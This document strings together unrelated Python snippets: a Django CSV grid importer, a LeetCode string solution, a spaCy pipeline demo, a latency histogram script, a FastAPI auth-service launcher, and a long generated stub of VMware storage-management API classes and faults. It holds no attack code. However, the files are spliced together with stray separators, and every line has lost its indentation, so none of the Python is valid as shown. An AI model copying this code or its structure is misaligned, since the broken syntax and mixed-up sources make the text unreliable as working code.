csvReader = csv.reader(csvDataFile)
project_slugs = next(csvReader)[1:]
feature_rows = []
for row in csvReader:
feature_rows.append({
'name': row[0],
'values': row[1:]
})
for i, project_slug in enumerate(project_slugs):
project = Project.objects.get(slug=project_slug)
grid_package = GridPackage.objects.create(grid=grid, package=project)
for feature_row in feature_rows:
feature, _ = Feature.objects.get_or_create(grid=grid, title=feature_row['name'], description='')
Element.objects.create(grid_package=grid_package, feature=feature, text=feature_row['values'][i])
|
class Solution:
def reorderSpaces(self, text: str) -> str:
wo = text.split()
if len(wo) == 1: return wo[0] + ' '*text.count(' ')
sp = text.count(' ')
be = sp//(len(wo)-1)
af = sp - (sp//(len(wo)-1))*(len(wo)-1)
ans = ' '*be
ans = ans.join(wo) + ' '*af
return ans |
import spacy
# Carga el modelo es_core_news_sm
nlp = spacy.load("es_core_news_sm")
# Imprime en pantalla los nombres de los componentes del pipeline
print(nlp.pipe_names)
# Imprime en pantalla el pipeline entero de tuples (name, component)
print(nlp.pipeline)
|
#!/usr/bin/env python3
import argparse
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import colors
parser = argparse.ArgumentParser()
parser.add_argument('input')
args = parser.parse_args()
data = []
with open(args.input) as f:
lines = f.readlines()
for line in lines:
line = line.strip()
if len(line) <= 1:
continue
tokens = line.split()
frame_start = int(tokens[0])
frame_end = int(tokens[1])
userland = int(tokens[2])
data.append((frame_start, frame_end, userland))
data = np.asarray(data)
frame_txlen = data[:,1] - data[:,0]
print(f'mean frame TX length: {np.mean(frame_txlen)}')
userland_latency = data[:,2] - data[:,1]
plt.hist(userland_latency, bins=200)
plt.xlabel('microseconds')
plt.title('Histogram of latency between end of image TX and its arrival in host userland')
plt.show()
|
import uvicorn
from fastapi import FastAPI
from fastapi_versioning import VersionedFastAPI
from config import config
from routers import root, auth
from databases.database import engine, Base
app = FastAPI(
title='py-auth',
description='Authentication service made by Python'
)
# Config
configuration = config.Settings()
# database
Base.metadata.create_all(bind=engine)
# routers
app.include_router(root.router)
app.include_router(auth.router)
# Versioned_FastAPI
app = VersionedFastAPI(app,
prefix_format='/v{major}',
version_format='{major}')
if __name__ == "__main__":
uvicorn.run(app, host='0.0.0.0', port=8080) |
from enum import Enum
class sms(object): # (unknown name)
class AboutInfo(vmodl.DynamicData): # sms.AboutInfo
name = ""
fullName = ""
vendor = ""
apiVersion = ""
instanceUuid = ""
vasaApiVersion = ""
class EntityReference(vmodl.DynamicData): # sms.EntityReference
id = ""
type = sms.EntityReference.EntityType()
class EntityType(Enum): # sms.EntityReference.EntityType
datacenter = 0
resourcePool = 1
storagePod = 2
cluster = 3
vm = 4
datastore = 5
host = 6
vmFile = 7
scsiPath = 8
scsiTarget = 9
scsiVolume = 10
scsiAdapter = 11
nasMount = 12
class FaultDomainFilter(vmodl.DynamicData): # sms.FaultDomainFilter
providerId = ""
class ReplicationGroupFilter(vmodl.DynamicData): # sms.ReplicationGroupFilter
groupId = [ vim.vm.replication.ReplicationGroupId() ]
class ServiceInstance(vmodl.ManagedObject): # sms.ServiceInstance
def queryStorageManager(): # sms.ServiceInstance.queryStorageManager
return sms.StorageManager()
def querySessionManager(): # sms.ServiceInstance.querySessionManager
return sms.auth.SessionManager()
def queryAboutInfo(): # sms.ServiceInstance.queryAboutInfo
return sms.AboutInfo()
class StorageManager(vmodl.ManagedObject): # sms.StorageManager
def registerProvider(providerSpec=sms.provider.ProviderSpec()): # sms.StorageManager.registerProvider
# throws vim.fault.AlreadyExists, sms.fault.ProviderRegistrationFault
return sms.Task()
def unregisterProvider(providerId=""): # sms.StorageManager.unregisterProvider
# throws vim.fault.NotFound, sms.fault.ProviderUnregistrationFault
return sms.Task()
def queryProvider(): # sms.StorageManager.queryProvider
# throws sms.fault.QueryExecutionFault
return [ sms.provider.Provider() ]
def queryArray(providerId=[ "" ] or None): # sms.StorageManager.queryArray
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.StorageArray() ]
def queryProcessorAssociatedWithArray(arrayId=""): # sms.StorageManager.queryProcessorAssociatedWithArray
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.StorageProcessor() ]
def queryPortAssociatedWithArray(arrayId=""): # sms.StorageManager.queryPortAssociatedWithArray
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.StoragePort() ]
def queryPortAssociatedWithLun(scsi3Id="", arrayId=""): # sms.StorageManager.queryPortAssociatedWithLun
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return sms.storage.StoragePort()
def queryLunAssociatedWithPort(portId="", arrayId=""): # sms.StorageManager.queryLunAssociatedWithPort
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.StorageLun() ]
def queryArrayAssociatedWithLun(canonicalName=""): # sms.StorageManager.queryArrayAssociatedWithLun
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return sms.storage.StorageArray()
def queryPortAssociatedWithProcessor(processorId="", arrayId=""): # sms.StorageManager.queryPortAssociatedWithProcessor
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.StoragePort() ]
def queryLunAssociatedWithArray(arrayId=""): # sms.StorageManager.queryLunAssociatedWithArray
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.StorageLun() ]
def queryFileSystemAssociatedWithArray(arrayId=""): # sms.StorageManager.queryFileSystemAssociatedWithArray
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.StorageFileSystem() ]
def queryDatastoreCapability(datastore=vim.Datastore()): # sms.StorageManager.queryDatastoreCapability
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return sms.storage.StorageCapability()
def queryHostAssociatedWithLun(scsi3Id="", arrayId=""): # sms.StorageManager.queryHostAssociatedWithLun
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ vim.HostSystem() ]
def queryVmfsDatastoreAssociatedWithLun(scsi3Id="", arrayId=""): # sms.StorageManager.queryVmfsDatastoreAssociatedWithLun
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return vim.Datastore()
def queryNfsDatastoreAssociatedWithFileSystem(fileSystemId="", arrayId=""): # sms.StorageManager.queryNfsDatastoreAssociatedWithFileSystem
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return vim.Datastore()
def queryDrsMigrationCapabilityForPerformance(srcDatastore=vim.Datastore(), dstDatastore=vim.Datastore()): # sms.StorageManager.queryDrsMigrationCapabilityForPerformance
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return False
def queryDrsMigrationCapabilityForPerformanceEx(datastore=[ vim.Datastore() ]): # sms.StorageManager.queryDrsMigrationCapabilityForPerformanceEx
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return sms.storage.DrsMigrationCapabilityResult()
def queryStorageContainer(containerSpec=sms.storage.StorageContainerSpec() or None): # sms.StorageManager.queryStorageContainer
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return sms.storage.StorageContainerResult()
def queryAssociatedBackingStoragePool(entityId="" or None, entityType="" or None): # sms.StorageManager.queryAssociatedBackingStoragePool
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.BackingStoragePool() ]
def queryDatastoreBackingPoolMapping(datastore=[ vim.Datastore() ]): # sms.StorageManager.queryDatastoreBackingPoolMapping
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ sms.storage.DatastoreBackingPoolMapping() ]
def refreshCACertificatesAndCRLs(providerId=[ "" ] or None): # sms.StorageManager.refreshCACertificatesAndCRLs
# throws vim.fault.NotFound, sms.fault.CertificateRefreshFailed
return sms.Task()
def queryFaultDomain(filter=sms.FaultDomainFilter() or None): # sms.StorageManager.queryFaultDomain
# throws vim.fault.NotFound, sms.fault.QueryExecutionFault
return [ vim.vm.replication.FaultDomainId() ]
def queryReplicationGroupInfo(rgFilter=sms.ReplicationGroupFilter()): # sms.StorageManager.queryReplicationGroupInfo
# throws sms.fault.QueryExecutionFault
return [ sms.storage.replication.GroupOperationResult() ]
class Task(vmodl.ManagedObject): # sms.Task
def queryResult(): # sms.Task.queryResult
return {}
def queryInfo(): # sms.Task.queryInfo
return sms.TaskInfo()
class TaskInfo(vmodl.DynamicData): # sms.TaskInfo
key = ""
task = sms.Task()
object = vmodl.ManagedObject()
error = vmodl.MethodFault()
result = {}
startTime = vmodl.DateTime()
completionTime = vmodl.DateTime()
state = ""
progress = 0
class State(Enum): # sms.TaskInfo.State
queued = 0
running = 1
success = 2
error = 3
class fault(object): # (unknown name)
class AuthConnectionFailed(vim.fault.NoPermission): # sms.fault.AuthConnectionFailed
pass
class CertificateRefreshFailed(vmodl.MethodFault): # sms.fault.CertificateRefreshFailed
providerId = [ "" ]
class CertificateRevocationFailed(vmodl.MethodFault): # sms.fault.CertificateRevocationFailed
pass
class DuplicateEntry(vmodl.MethodFault): # sms.fault.DuplicateEntry
pass
class InactiveProvider(vmodl.MethodFault): # sms.fault.InactiveProvider
mapping = [ sms.storage.FaultDomainProviderMapping() ]
class InvalidLogin(vmodl.MethodFault): # sms.fault.InvalidLogin
pass
class InvalidProfile(vmodl.MethodFault): # sms.fault.InvalidProfile
pass
class InvalidSession(vim.fault.NoPermission): # sms.fault.InvalidSession
sessionCookie = ""
class MultipleSortSpecsNotSupported(vmodl.fault.InvalidArgument): # sms.fault.MultipleSortSpecsNotSupported
pass
class NotSupportedByProvider(vmodl.MethodFault): # sms.fault.NotSupportedByProvider
pass
class ProviderBusy(vmodl.MethodFault): # sms.fault.ProviderBusy
pass
class ProviderConnectionFailed(vmodl.RuntimeFault): # sms.fault.ProviderConnectionFailed
pass
class ProviderOutOfProvisioningResource(vmodl.MethodFault): # sms.fault.ProviderOutOfProvisioningResource
provisioningResourceId = ""
availableBefore = 0
availableAfter = 0
total = 0
isTransient = False
class ProviderOutOfResource(vmodl.MethodFault): # sms.fault.ProviderOutOfResource
pass
class ProviderRegistrationFault(vmodl.MethodFault): # sms.fault.ProviderRegistrationFault
pass
class ProviderSyncFailed(vmodl.MethodFault): # sms.fault.ProviderSyncFailed
pass
class ProviderUnavailable(vmodl.MethodFault): # sms.fault.ProviderUnavailable
pass
class ProviderUnregistrationFault(vmodl.MethodFault): # sms.fault.ProviderUnregistrationFault
pass
class ProxyRegistrationFailed(vmodl.RuntimeFault): # sms.fault.ProxyRegistrationFailed
pass
class QueryExecutionFault(vmodl.MethodFault): # sms.fault.QueryExecutionFault
pass
class QueryNotSupported(vmodl.fault.InvalidArgument): # sms.fault.QueryNotSupported
entityType = sms.EntityReference.EntityType()
relatedEntityType = sms.EntityReference.EntityType()
class ResourceInUse(vim.fault.ResourceInUse): # sms.fault.ResourceInUse
deviceIds = [ sms.storage.replication.DeviceId() ]
class ServiceNotInitialized(vmodl.RuntimeFault): # sms.fault.ServiceNotInitialized
pass
class SyncInProgress(sms.fault.ProviderSyncFailed): # sms.fault.SyncInProgress
pass
class TooMany(vmodl.MethodFault): # sms.fault.TooMany
maxBatchSize = 0
class replication(object): # (unknown name)
class ReplicationFault(vmodl.MethodFault): # sms.fault.replication.ReplicationFault
pass
class SyncOngoing(sms.fault.replication.ReplicationFault): # sms.fault.replication.SyncOngoing
task = sms.Task()
class AlreadyDone(sms.fault.replication.ReplicationFault): # sms.fault.replication.AlreadyDone
pass
class InvalidFunctionTarget(sms.fault.replication.ReplicationFault): # sms.fault.replication.InvalidFunctionTarget
pass
class InvalidReplicationState(sms.fault.replication.ReplicationFault): # sms.fault.replication.InvalidReplicationState
desiredState = [ "" ]
currentState = ""
class NoReplicationTarget(sms.fault.replication.ReplicationFault): # sms.fault.replication.NoReplicationTarget
pass
class NoValidReplica(sms.fault.replication.ReplicationFault): # sms.fault.replication.NoValidReplica
deviceId = sms.storage.replication.DeviceId()
class PeerNotReachable(sms.fault.replication.ReplicationFault): # sms.fault.replication.PeerNotReachable
pass
class CertificateAuthorityFault(sms.fault.ProviderRegistrationFault): # sms.fault.CertificateAuthorityFault
faultCode = 0
class CertificateNotImported(sms.fault.ProviderRegistrationFault): # sms.fault.CertificateNotImported
pass
class CertificateNotTrusted(sms.fault.ProviderRegistrationFault): # sms.fault.CertificateNotTrusted
certificate = ""
class IncorrectUsernamePassword(sms.fault.ProviderRegistrationFault): # sms.fault.IncorrectUsernamePassword
pass
class InvalidCertificate(sms.fault.ProviderRegistrationFault): # sms.fault.InvalidCertificate
certificate = ""
class InvalidUrl(sms.fault.ProviderRegistrationFault): # sms.fault.InvalidUrl
url = ""
class NoCommonProviderForAllBackings(sms.fault.QueryExecutionFault): # sms.fault.NoCommonProviderForAllBackings
pass
class ProviderNotFound(sms.fault.QueryExecutionFault): # sms.fault.ProviderNotFound
pass
class provider(object): # (unknown name)
class AlarmFilter(vmodl.DynamicData): # sms.provider.AlarmFilter
alarmStatus = ""
alarmType = ""
entityType = ""
entityId = [ {} ]
pageMarker = ""
class AlarmResult(vmodl.DynamicData): # sms.provider.AlarmResult
storageAlarm = [ sms.storage.StorageAlarm() ]
pageMarker = ""
class Provider(vmodl.ManagedObject): # sms.provider.Provider
def queryProviderInfo(): # sms.provider.Provider.queryProviderInfo
return sms.provider.ProviderInfo()
class ProviderInfo(vmodl.DynamicData): # sms.provider.ProviderInfo
uid = ""
name = ""
description = ""
version = ""
class ProviderSpec(vmodl.DynamicData): # sms.provider.ProviderSpec
name = ""
description = ""
class VasaProvider(sms.provider.Provider): # sms.provider.VasaProvider
def sync(arrayId="" or None): # sms.provider.VasaProvider.sync
# throws sms.fault.ProviderSyncFailed
return sms.Task()
def refreshCertificate(): # sms.provider.VasaProvider.refreshCertificate
# throws sms.fault.CertificateRefreshFailed
return sms.Task()
def revokeCertificate(): # sms.provider.VasaProvider.revokeCertificate
# throws sms.fault.CertificateRevocationFailed
return sms.Task()
def reconnect(): # sms.provider.VasaProvider.reconnect
# throws sms.fault.InvalidCertificate, sms.fault.ProviderConnectionFailed
return sms.Task()
def queryReplicationPeer(faultDomainId=[ vim.vm.replication.FaultDomainId() ] or None): # sms.provider.VasaProvider.queryReplicationPeer
# throws sms.fault.ProviderUnavailable, sms.fault.InactiveProvider, sms.fault.ProviderBusy, sms.fault.QueryExecutionFault
return [ sms.storage.replication.QueryReplicationPeerResult() ]
def queryReplicationGroup(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None): # sms.provider.VasaProvider.queryReplicationGroup
# throws sms.fault.ProviderUnavailable, sms.fault.InactiveProvider, sms.fault.ProviderBusy, sms.fault.QueryExecutionFault
return [ sms.storage.replication.GroupOperationResult() ]
def queryPointInTimeReplica(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None, queryParam=sms.storage.replication.QueryPointInTimeReplicaParam() or None): # sms.provider.VasaProvider.queryPointInTimeReplica
# throws sms.fault.ProviderUnavailable, sms.fault.InactiveProvider, sms.fault.ProviderBusy, sms.fault.QueryExecutionFault
return [ sms.storage.replication.GroupOperationResult() ]
def testFailoverReplicationGroupStart(testFailoverParam=sms.storage.replication.TestFailoverParam()): # sms.provider.VasaProvider.testFailoverReplicationGroupStart
# throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
return sms.Task()
def testFailoverReplicationGroupStop(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None, force=False): # sms.provider.VasaProvider.testFailoverReplicationGroupStop
# throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault, sms.fault.NotSupportedByProvider
return sms.Task()
def promoteReplicationGroup(promoteParam=sms.storage.replication.PromoteParam()): # sms.provider.VasaProvider.promoteReplicationGroup
# throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
return sms.Task()
def syncReplicationGroup(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None, pitName=""): # sms.provider.VasaProvider.syncReplicationGroup
# throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault, sms.fault.TooMany
return sms.Task()
def prepareFailoverReplicationGroup(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None): # sms.provider.VasaProvider.prepareFailoverReplicationGroup
# throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
return sms.Task()
def failoverReplicationGroup(failoverParam=sms.storage.replication.FailoverParam()): # sms.provider.VasaProvider.failoverReplicationGroup
# throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
return sms.Task()
def reverseReplicateGroup(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None): # sms.provider.VasaProvider.reverseReplicateGroup
# throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
return sms.Task()
def queryActiveAlarm(alarmFilter=sms.provider.AlarmFilter() or None): # sms.provider.VasaProvider.queryActiveAlarm
# throws vim.fault.NotFound, sms.fault.ProviderBusy, sms.fault.InactiveProvider, sms.fault.ProviderUnavailable, sms.fault.QueryExecutionFault
return sms.provider.AlarmResult()
class VasaProviderInfo(sms.provider.ProviderInfo): # sms.provider.VasaProviderInfo
url = ""
certificate = ""
status = ""
statusFault = vmodl.MethodFault()
vasaVersion = ""
namespace = ""
lastSyncTime = ""
supportedVendorModelMapping = [ sms.provider.VasaProviderInfo.SupportedVendorModelMapping() ]
supportedProfile = [ "" ]
supportedProviderProfile = [ "" ]
relatedStorageArray = [ sms.provider.VasaProviderInfo.RelatedStorageArray() ]
providerId = ""
certificateExpiryDate = ""
certificateStatus = ""
serviceLocation = ""
needsExplicitActivation = False
maxBatchSize = 0
retainVasaProviderCertificate = False
arrayIndependentProvider = False
type = ""
category = ""
priority = 0
failoverGroupId = ""
class CertificateStatus(Enum): # sms.provider.VasaProviderInfo.CertificateStatus
valid = 0
expirySoftLimitReached = 1
expiryHardLimitReached = 2
expired = 3
invalid = 4
class RelatedStorageArray(vmodl.DynamicData): # sms.provider.VasaProviderInfo.RelatedStorageArray
arrayId = ""
active = False
manageable = False
priority = 0
class SupportedVendorModelMapping(vmodl.DynamicData): # sms.provider.VasaProviderInfo.SupportedVendorModelMapping
vendorId = ""
modelId = ""
class VasaProviderStatus(Enum): # sms.provider.VasaProviderInfo.VasaProviderStatus
online = 0
offline = 1
syncError = 2
unknown = 3
connected = 4
disconnected = 5
class VasaProviderProfile(Enum): # sms.provider.VasaProviderInfo.VasaProviderProfile
blockDevice = 0
fileSystem = 1
capability = 2
class ProviderProfile(Enum): # sms.provider.VasaProviderInfo.ProviderProfile
ProfileBasedManagement = 0
Replication = 1
class Type(Enum): # sms.provider.VasaProviderInfo.Type
PERSISTENCE = 0
DATASERVICE = 1
UNKNOWN = 2
class Category(Enum): # sms.provider.VasaProviderInfo.Category
internal = 0
external = 1
class VasaProviderSpec(sms.provider.ProviderSpec): # sms.provider.VasaProviderSpec
username = ""
password = ""
url = ""
certificate = ""
class VmodlVasaProviderSpec(object): # (unknown name)
class AuthenticationType(Enum): # sms.provider.VmodlVasaProviderSpec.AuthenticationType
LoginByToken = 0
UseSessionId = 1
class storage(object): # (unknown name)
class AlarmStatus(Enum): # sms.storage.AlarmStatus
Red = 0
Green = 1
Yellow = 2
class AlarmType(Enum): # sms.storage.AlarmType
SpaceCapacityAlarm = 0
CapabilityAlarm = 1
StorageObjectAlarm = 2
ObjectAlarm = 3
ComplianceAlarm = 4
ManageabilityAlarm = 5
ReplicationAlarm = 6
class BackingConfig(vmodl.DynamicData): # sms.storage.BackingConfig
thinProvisionBackingIdentifier = ""
deduplicationBackingIdentifier = ""
autoTieringEnabled = False
deduplicationEfficiency = 0
performanceOptimizationInterval = 0
class BackingStoragePool(vmodl.DynamicData): # sms.storage.BackingStoragePool
uuid = ""
type = ""
capacityInMB = 0
usedSpaceInMB = 0
class BackingStoragePoolType(Enum): # sms.storage.BackingStoragePool.BackingStoragePoolType
thinProvisioningPool = 0
deduplicationPool = 1
thinAndDeduplicationCombinedPool = 2
class DatastoreBackingPoolMapping(vmodl.DynamicData): # sms.storage.DatastoreBackingPoolMapping
datastore = [ vim.Datastore() ]
backingStoragePool = [ sms.storage.BackingStoragePool() ]
class DatastorePair(vmodl.DynamicData): # sms.storage.DatastorePair
datastore1 = vim.Datastore()
datastore2 = vim.Datastore()
class DrsMigrationCapabilityResult(vmodl.DynamicData): # sms.storage.DrsMigrationCapabilityResult
recommendedDatastorePair = [ sms.storage.DatastorePair() ]
nonRecommendedDatastorePair = [ sms.storage.DatastorePair() ]
class EntityType(Enum): # sms.storage.EntityType
StorageArrayEntity = 0
StorageProcessorEntity = 1
StoragePortEntity = 2
StorageLunEntity = 3
StorageFileSystemEntity = 4
StorageCapabilityEntity = 5
CapabilitySchemaEntity = 6
CapabilityProfileEntity = 7
DefaultProfileEntity = 8
ResourceAssociationEntity = 9
StorageContainerEntity = 10
StorageObjectEntity = 11
MessageCatalogEntity = 12
ProtocolEndpointEntity = 13
VirtualVolumeInfoEntity = 14
BackingStoragePoolEntity = 15
FaultDomainEntity = 16
ReplicationGroupEntity = 17
class FaultDomainProviderMapping(vmodl.DynamicData): # sms.storage.FaultDomainProviderMapping
activeProvider = sms.provider.Provider()
faultDomainId = [ vim.vm.replication.FaultDomainId() ]
class FileSystemInfo(vmodl.DynamicData): # sms.storage.FileSystemInfo
fileServerName = ""
fileSystemPath = ""
ipAddress = ""
class LunHbaAssociation(vmodl.DynamicData): # sms.storage.LunHbaAssociation
canonicalName = ""
hba = [ vim.host.HostBusAdapter() ]
class NameValuePair(vmodl.DynamicData): # sms.storage.NameValuePair
parameterName = ""
parameterValue = ""
class StorageAlarm(vmodl.DynamicData): # sms.storage.StorageAlarm
alarmId = 0
alarmType = ""
containerId = ""
objectId = ""
objectType = ""
status = ""
alarmTimeStamp = vmodl.DateTime()
messageId = ""
parameterList = [ sms.storage.NameValuePair() ]
alarmObject = {}
class StorageArray(vmodl.DynamicData): # sms.storage.StorageArray
name = ""
uuid = ""
vendorId = ""
modelId = ""
firmware = ""
alternateName = [ "" ]
supportedBlockInterface = [ "" ]
supportedFileSystemInterface = [ "" ]
supportedProfile = [ "" ]
priority = 0
class BlockDeviceInterface(Enum): # sms.storage.StorageArray.BlockDeviceInterface
fc = 0
iscsi = 1
fcoe = 2
otherBlock = 3
class FileSystemInterface(Enum): # sms.storage.StorageArray.FileSystemInterface
nfs = 0
otherFileSystem = 1
class VasaProfile(Enum): # sms.storage.StorageArray.VasaProfile
blockDevice = 0
fileSystem = 1
capability = 2
policy = 3
object = 4
statistics = 5
storageDrsBlockDevice = 6
storageDrsFileSystem = 7
class StorageCapability(vmodl.DynamicData): # sms.storage.StorageCapability
uuid = ""
name = ""
description = ""
class StorageContainer(vmodl.DynamicData): # sms.storage.StorageContainer
uuid = ""
name = ""
maxVvolSizeInMB = 0
providerId = [ "" ]
arrayId = [ "" ]
class StorageContainerResult(vmodl.DynamicData): # sms.storage.StorageContainerResult
storageContainer = [ sms.storage.StorageContainer() ]
providerInfo = [ sms.provider.ProviderInfo() ]
class StorageContainerSpec(vmodl.DynamicData): # sms.storage.StorageContainerSpec
containerId = [ "" ]
class StorageFileSystem(vmodl.DynamicData): # sms.storage.StorageFileSystem
uuid = ""
info = [ sms.storage.FileSystemInfo() ]
nativeSnapshotSupported = False
thinProvisioningStatus = ""
type = ""
version = ""
backingConfig = sms.storage.BackingConfig()
class FileSystemInterfaceVersion(Enum): # sms.storage.StorageFileSystem.FileSystemInterfaceVersion
NFSV3_0 = 0
class StorageLun(vmodl.DynamicData): # sms.storage.StorageLun
uuid = ""
vSphereLunIdentifier = ""
vendorDisplayName = ""
capacityInMB = 0
usedSpaceInMB = 0
lunThinProvisioned = False
alternateIdentifier = [ "" ]
drsManagementPermitted = False
thinProvisioningStatus = ""
backingConfig = sms.storage.BackingConfig()
class StoragePort(vmodl.DynamicData): # sms.storage.StoragePort
uuid = ""
type = ""
alternateName = [ "" ]
class StorageProcessor(vmodl.DynamicData): # sms.storage.StorageProcessor
uuid = ""
alternateIdentifer = [ "" ]
class ThinProvisioningStatus(Enum): # sms.storage.ThinProvisioningStatus
RED = 0
YELLOW = 1
GREEN = 2
class replication(object): # (unknown name)
class DeviceId(vmodl.DynamicData): # sms.storage.replication.DeviceId
pass
class FailoverParam(vmodl.DynamicData): # sms.storage.replication.FailoverParam
isPlanned = False
checkOnly = False
replicationGroupsToFailover = [ sms.storage.replication.FailoverParam.ReplicationGroupData() ]
policyAssociations = [ sms.storage.replication.FailoverParam.PolicyAssociation() ]
class ReplicationGroupData(vmodl.DynamicData): # sms.storage.replication.FailoverParam.ReplicationGroupData
groupId = vim.vm.replication.ReplicationGroupId()
pitId = sms.storage.replication.PointInTimeReplicaId()
class PolicyAssociation(vmodl.DynamicData): # sms.storage.replication.FailoverParam.PolicyAssociation
id = sms.storage.replication.DeviceId()
policyId = ""
datastore = vim.Datastore()
class FaultDomainInfo(vim.vm.replication.FaultDomainId): # sms.storage.replication.FaultDomainInfo
name = ""
description = ""
storageArrayId = ""
children = [ vim.vm.replication.FaultDomainId() ]
provider = sms.provider.Provider()
class GroupInfo(vmodl.DynamicData): # sms.storage.replication.GroupInfo
groupId = vim.vm.replication.ReplicationGroupId()
class GroupOperationResult(vmodl.DynamicData): # sms.storage.replication.GroupOperationResult
groupId = vim.vm.replication.ReplicationGroupId()
warning = [ vmodl.MethodFault() ]
class PointInTimeReplicaId(vmodl.DynamicData): # sms.storage.replication.PointInTimeReplicaId
id = ""
class PromoteParam(vmodl.DynamicData): # sms.storage.replication.PromoteParam
isPlanned = False
replicationGroupsToPromote = [ vim.vm.replication.ReplicationGroupId() ]
class QueryPointInTimeReplicaParam(vmodl.DynamicData): # sms.storage.replication.QueryPointInTimeReplicaParam
replicaTimeQueryParam = sms.storage.replication.QueryPointInTimeReplicaParam.ReplicaQueryIntervalParam()
pitName = ""
tags = [ "" ]
class ReplicaQueryIntervalParam(vmodl.DynamicData): # sms.storage.replication.QueryPointInTimeReplicaParam.ReplicaQueryIntervalParam
fromDate = vmodl.DateTime()
toDate = vmodl.DateTime()
number = 0
class QueryPointInTimeReplicaSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.QueryPointInTimeReplicaSuccessResult
replicaInfo = [ sms.storage.replication.QueryPointInTimeReplicaSuccessResult.PointInTimeReplicaInfo() ]
class PointInTimeReplicaInfo(vmodl.DynamicData): # sms.storage.replication.QueryPointInTimeReplicaSuccessResult.PointInTimeReplicaInfo
id = sms.storage.replication.PointInTimeReplicaId()
pitName = ""
timeStamp = vmodl.DateTime()
tags = [ "" ]
class QueryPointInTimeReplicaSummaryResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.QueryPointInTimeReplicaSummaryResult
intervalResults = [ sms.storage.replication.QueryPointInTimeReplicaSummaryResult.ReplicaIntervalQueryResult() ]
class ReplicaIntervalQueryResult(vmodl.DynamicData): # sms.storage.replication.QueryPointInTimeReplicaSummaryResult.ReplicaIntervalQueryResult
fromDate = vmodl.DateTime()
toDate = vmodl.DateTime()
number = 0
class QueryReplicationGroupSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.QueryReplicationGroupSuccessResult
rgInfo = sms.storage.replication.GroupInfo()
class QueryReplicationPeerResult(vmodl.DynamicData): # sms.storage.replication.QueryReplicationPeerResult
sourceDomain = vim.vm.replication.FaultDomainId()
targetDomain = [ vim.vm.replication.FaultDomainId() ]
error = [ vmodl.MethodFault() ]
warning = [ vmodl.MethodFault() ]
class ReplicaId(vmodl.DynamicData): # sms.storage.replication.ReplicaId
id = ""
class ReplicationState(Enum): # sms.storage.replication.ReplicationState
SOURCE = 0
TARGET = 1
FAILEDOVER = 2
INTEST = 3
REMOTE_FAILEDOVER = 4
class ReverseReplicationSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.ReverseReplicationSuccessResult
newGroupId = vim.vm.replication.DeviceGroupId()
class SourceGroupInfo(sms.storage.replication.GroupInfo): # sms.storage.replication.SourceGroupInfo
name = ""
description = ""
state = ""
replica = [ sms.storage.replication.SourceGroupInfo.ReplicationTargetInfo() ]
memberInfo = [ sms.storage.replication.SourceGroupMemberInfo() ]
class ReplicationTargetInfo(vmodl.DynamicData): # sms.storage.replication.SourceGroupInfo.ReplicationTargetInfo
targetGroupId = vim.vm.replication.ReplicationGroupId()
replicationAgreementDescription = ""
class SourceGroupMemberInfo(vmodl.DynamicData): # sms.storage.replication.SourceGroupMemberInfo
deviceId = sms.storage.replication.DeviceId()
targetId = [ sms.storage.replication.SourceGroupMemberInfo.TargetDeviceId() ]
class TargetDeviceId(vmodl.DynamicData): # sms.storage.replication.SourceGroupMemberInfo.TargetDeviceId
domainId = vim.vm.replication.FaultDomainId()
deviceId = sms.storage.replication.ReplicaId()
class SyncReplicationGroupSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.SyncReplicationGroupSuccessResult
timeStamp = vmodl.DateTime()
pitId = sms.storage.replication.PointInTimeReplicaId()
pitName = ""
class TargetGroupInfo(sms.storage.replication.GroupInfo): # sms.storage.replication.TargetGroupInfo
sourceInfo = sms.storage.replication.TargetGroupInfo.TargetToSourceInfo()
